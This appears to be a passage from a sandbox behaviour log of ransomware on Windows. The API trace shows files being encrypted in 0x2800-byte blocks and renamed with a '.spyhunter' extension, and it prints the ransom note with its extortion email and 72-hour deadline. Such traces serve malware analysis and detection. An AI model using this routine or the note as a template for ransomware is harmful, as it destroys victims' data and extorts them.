lpNewFilePointer=0xffffffff) returned 1 [0129.008] WriteFile (in: hFile=0x120, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x1df, lpNumberOfBytesWritten=0x57f704, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f704*=0x1df, lpOverlapped=0x0) returned 1 [0129.008] GetProcessHeap () returned 0x2c0000 [0129.008] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0129.008] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.008] WriteFile (in: hFile=0x120, lpBuffer=0x57f744*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f704, lpOverlapped=0x0 | out: lpBuffer=0x57f744*, lpNumberOfBytesWritten=0x57f704*=0x4, lpOverlapped=0x0) returned 1 [0129.009] WriteFile (in: hFile=0x120, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f704, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f704*=0x30, lpOverlapped=0x0) returned 1 [0129.009] CloseHandle (hObject=0x120) returned 1 [0129.009] GetProcessHeap () returned 0x2c0000 [0129.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0129.009] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata.spyhunter") returned 87 [0129.009] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata" (normalized: "c:\\programdata\\adobe\\acrobat\\10.0\\replicate\\security\\directories.acrodata"), lpNewFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata.spyhunter" (normalized: "c:\\programdata\\adobe\\acrobat\\10.0\\replicate\\security\\directories.acrodata.spyhunter")) returned 1 [0129.009] GetProcessHeap () returned 0x2c0000 [0129.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0129.009] GetProcessHeap () returned 0x2c0000 [0129.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0129.010] GetProcessHeap () returned 0x2c0000 [0129.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eef348 | out: hHeap=0x2c0000) returned 1 [0129.010] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f748 | out: pbBuffer=0x57f748) returned 1 [0129.010] GetProcessHeap () returned 0x2c0000 [0129.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0129.010] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f740*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f740*=0x30) returned 1 [0129.010] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\.." (normalized: "c:"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.010] GetProcessHeap () returned 0x2c0000 [0129.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0129.010] GetProcessHeap () returned 0x2c0000 [0129.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0129.010] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f740 | out: pbBuffer=0x57f740) returned 1 [0129.010] GetProcessHeap () returned 0x2c0000 [0129.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0129.010] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x57f738*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x57f738*=0x30) returned 1 [0129.010] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\." (normalized: "c:\\programdata\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.010] GetProcessHeap () returned 0x2c0000 [0129.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0129.010] GetProcessHeap () returned 0x2c0000 [0129.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0129.011] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0129.011] WriteFile (in: hFile=0x120, lpBuffer=0x57f673*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57f79c, lpOverlapped=0x0 | out: lpBuffer=0x57f673*, lpNumberOfBytesWritten=0x57f79c*=0x127, lpOverlapped=0x0) returned 1 [0129.012] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0129.012] WriteFile (in: hFile=0x120, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57f79c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57f79c*=0x2ac, lpOverlapped=0x0) returned 1 [0129.012] CloseHandle (hObject=0x120) returned 1 [0129.012] GetProcessHeap () returned 0x2c0000 [0129.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d0a728 | out: hHeap=0x2c0000) returned 1 [0129.013] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f738 | out: pbBuffer=0x57f738) returned 1 [0129.013] GetProcessHeap () returned 0x2c0000 [0129.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0129.013] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f730*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f730*=0x30) returned 1 [0129.013] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\wlsrvc.dll" (normalized: "c:\\program files (x86)\\windows sidebar\\wlsrvc.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.014] GetProcessHeap () returned 0x2c0000 [0129.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0129.014] GetProcessHeap () returned 0x2c0000 [0129.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec1e30 | out: hHeap=0x2c0000) returned 1 [0129.014] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f730 | out: pbBuffer=0x57f730) returned 1 [0129.014] GetProcessHeap () returned 0x2c0000 [0129.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0129.014] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f728*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f728*=0x30) returned 1 [0129.014] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\sidebar.exe" (normalized: "c:\\program files (x86)\\windows sidebar\\sidebar.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.015] GetProcessHeap () returned 0x2c0000 [0129.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0129.015] GetProcessHeap () returned 0x2c0000 [0129.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec1d78 | out: hHeap=0x2c0000) returned 1 [0129.016] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f728 | out: pbBuffer=0x57f728) returned 1 [0129.016] GetProcessHeap () returned 0x2c0000 [0129.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0129.016] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f720*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f720*=0x30) returned 1 [0129.016] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\settings.ini" (normalized: "c:\\program files (x86)\\windows sidebar\\settings.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0129.016] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\settings.ini") returned 55 [0129.016] StrStrW (lpFirst="settings.ini", lpSrch=".txt") returned 0x0 [0129.016] GetProcessHeap () returned 0x2c0000 [0129.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0129.016] ReadFile (in: hFile=0x120, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f6e4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f6e4*=0x50, lpOverlapped=0x0) returned 1 [0129.017] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xffffffb0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.017] WriteFile (in: hFile=0x120, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x57f6e4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f6e4*=0x50, lpOverlapped=0x0) returned 1 [0129.017] GetProcessHeap () returned 0x2c0000 [0129.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0129.017] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.017] WriteFile (in: hFile=0x120, lpBuffer=0x57f724*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f6e4, lpOverlapped=0x0 | out: lpBuffer=0x57f724*, lpNumberOfBytesWritten=0x57f6e4*=0x4, lpOverlapped=0x0) returned 1 [0129.018] WriteFile (in: hFile=0x120, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f6e4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x57f6e4*=0x30, lpOverlapped=0x0) returned 1 [0129.018] CloseHandle (hObject=0x120) returned 1 [0129.018] GetProcessHeap () returned 0x2c0000 [0129.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0129.018] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\settings.ini.spyhunter") returned 65 [0129.018] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\settings.ini" (normalized: "c:\\program files (x86)\\windows sidebar\\settings.ini"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\settings.ini.spyhunter" (normalized: "c:\\program files (x86)\\windows sidebar\\settings.ini.spyhunter")) returned 1 [0129.018] GetProcessHeap () returned 0x2c0000 [0129.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0129.018] GetProcessHeap () returned 0x2c0000 [0129.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0129.019] GetProcessHeap () returned 0x2c0000 [0129.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec1cc0 | out: hHeap=0x2c0000) returned 1 [0129.019] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f728 | out: pbBuffer=0x57f728) returned 1 [0129.019] GetProcessHeap () returned 0x2c0000 [0129.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0129.019] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f720*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f720*=0x30) returned 1 [0129.033] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\sbdrop.dll" (normalized: "c:\\program files (x86)\\windows sidebar\\sbdrop.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.033] GetProcessHeap () returned 0x2c0000 [0129.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0129.033] GetProcessHeap () returned 0x2c0000 [0129.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec1c08 | out: hHeap=0x2c0000) returned 1 [0129.053] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f708 | out: pbBuffer=0x57f708) returned 1 [0129.053] GetProcessHeap () returned 0x2c0000 [0129.053] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0129.053] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x57f700*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x57f700*=0x30) returned 1 [0129.053] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Pending.GRL" (normalized: "c:\\programdata\\microsoft\\mf\\pending.grl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0129.054] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Pending.GRL") returned 43 [0129.054] StrStrW (lpFirst="Pending.GRL", lpSrch=".txt") returned 0x0 [0129.054] GetProcessHeap () returned 0x2c0000 [0129.054] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0129.054] ReadFile (in: hFile=0x170, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f6c4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57f6c4*=0x2800, lpOverlapped=0x0) returned 1 [0129.140] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.140] WriteFile (in: hFile=0x170, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f6c4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57f6c4*=0x2800, lpOverlapped=0x0) returned 1 [0129.140] GetProcessHeap () returned 0x2c0000 [0129.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0129.140] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.140] WriteFile (in: hFile=0x170, lpBuffer=0x57f704*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f6c4, lpOverlapped=0x0 | out: lpBuffer=0x57f704*, lpNumberOfBytesWritten=0x57f6c4*=0x4, lpOverlapped=0x0) returned 1 [0129.214] WriteFile (in: hFile=0x170, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f6c4, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x57f6c4*=0x30, lpOverlapped=0x0) returned 1 [0129.214] CloseHandle (hObject=0x170) returned 1 [0129.214] GetProcessHeap () returned 0x2c0000 [0129.214] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ef5c20 [0129.214] wnsprintfW (in: pszDest=0x2ef5c20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Pending.GRL.spyhunter") returned 53 [0129.215] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Pending.GRL" (normalized: "c:\\programdata\\microsoft\\mf\\pending.grl"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Pending.GRL.spyhunter" (normalized: "c:\\programdata\\microsoft\\mf\\pending.grl.spyhunter")) returned 1 [0129.215] GetProcessHeap () returned 0x2c0000 [0129.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5c20 | out: hHeap=0x2c0000) returned 1 [0129.215] GetProcessHeap () returned 0x2c0000 [0129.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0129.215] GetProcessHeap () returned 0x2c0000 [0129.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d0a908 | out: hHeap=0x2c0000) returned 1 [0129.215] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f700 | out: pbBuffer=0x57f700) returned 1 [0129.216] GetProcessHeap () returned 0x2c0000 [0129.216] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0129.216] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x57f6f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x57f6f8*=0x30) returned 1 [0129.216] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointPortalSite.ico" (normalized: "c:\\programdata\\microsoft\\office\\sharepointportalsite.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0129.216] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointPortalSite.ico") returned 60 [0129.216] StrStrW (lpFirst="SharePointPortalSite.ico", lpSrch=".txt") returned 0x0 [0129.216] GetProcessHeap () returned 0x2c0000 [0129.216] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0129.216] ReadFile (in: hFile=0x170, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f6bc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f6bc*=0x2800, lpOverlapped=0x0) returned 1 [0129.261] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.261] WriteFile (in: hFile=0x170, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f6bc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f6bc*=0x2800, lpOverlapped=0x0) returned 1 [0129.261] GetProcessHeap () returned 0x2c0000 [0129.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0129.261] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.261] WriteFile (in: hFile=0x170, lpBuffer=0x57f6fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f6bc, lpOverlapped=0x0 | out: lpBuffer=0x57f6fc*, lpNumberOfBytesWritten=0x57f6bc*=0x4, lpOverlapped=0x0) returned 1 [0129.262] WriteFile (in: hFile=0x170, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f6bc, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x57f6bc*=0x30, lpOverlapped=0x0) returned 1 [0129.262] CloseHandle (hObject=0x170) returned 1 [0129.285] GetProcessHeap () returned 0x2c0000 [0129.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ef5c20 [0129.285] wnsprintfW (in: pszDest=0x2ef5c20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointPortalSite.ico.spyhunter") returned 70 [0129.285] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointPortalSite.ico" (normalized: "c:\\programdata\\microsoft\\office\\sharepointportalsite.ico"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointPortalSite.ico.spyhunter" (normalized: "c:\\programdata\\microsoft\\office\\sharepointportalsite.ico.spyhunter")) returned 1 [0129.286] GetProcessHeap () returned 0x2c0000 [0129.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5c20 | out: hHeap=0x2c0000) returned 1 [0129.286] GetProcessHeap () returned 0x2c0000 [0129.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0129.286] GetProcessHeap () returned 0x2c0000 [0129.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c84a60 | out: hHeap=0x2c0000) returned 1 [0129.288] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f6f8 | out: pbBuffer=0x57f6f8) returned 1 [0129.288] GetProcessHeap () returned 0x2c0000 [0129.288] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0129.288] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x57f6f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x57f6f0*=0x30) returned 1 [0129.288] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLSLICER.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\xlslicer.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0129.288] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLSLICER.DLL.trx_dll") returned 72 [0129.288] StrStrW (lpFirst="XLSLICER.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0129.288] GetProcessHeap () returned 0x2c0000 [0129.288] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0129.288] ReadFile (in: hFile=0x120, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f6b4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57f6b4*=0x2800, lpOverlapped=0x0) returned 1 [0129.311] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.311] WriteFile (in: hFile=0x120, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f6b4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57f6b4*=0x2800, lpOverlapped=0x0) returned 1 [0129.311] GetProcessHeap () returned 0x2c0000 [0129.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0129.311] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.311] WriteFile (in: hFile=0x120, lpBuffer=0x57f6f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f6b4, lpOverlapped=0x0 | out: lpBuffer=0x57f6f4*, lpNumberOfBytesWritten=0x57f6b4*=0x4, lpOverlapped=0x0) returned 1 [0129.323] WriteFile (in: hFile=0x120, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f6b4, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x57f6b4*=0x30, lpOverlapped=0x0) returned 1 [0129.323] CloseHandle (hObject=0x120) returned 1 [0129.323] GetProcessHeap () returned 0x2c0000 [0129.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ef5c20 [0129.323] wnsprintfW (in: pszDest=0x2ef5c20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLSLICER.DLL.trx_dll.spyhunter") returned 82 [0129.323] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLSLICER.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\xlslicer.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLSLICER.DLL.trx_dll.spyhunter" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\xlslicer.dll.trx_dll.spyhunter")) returned 1 [0129.324] GetProcessHeap () returned 0x2c0000 [0129.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5c20 | out: hHeap=0x2c0000) returned 1 [0129.324] GetProcessHeap () returned 0x2c0000 [0129.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0129.324] GetProcessHeap () returned 0x2c0000 [0129.324] HeapFree (in: 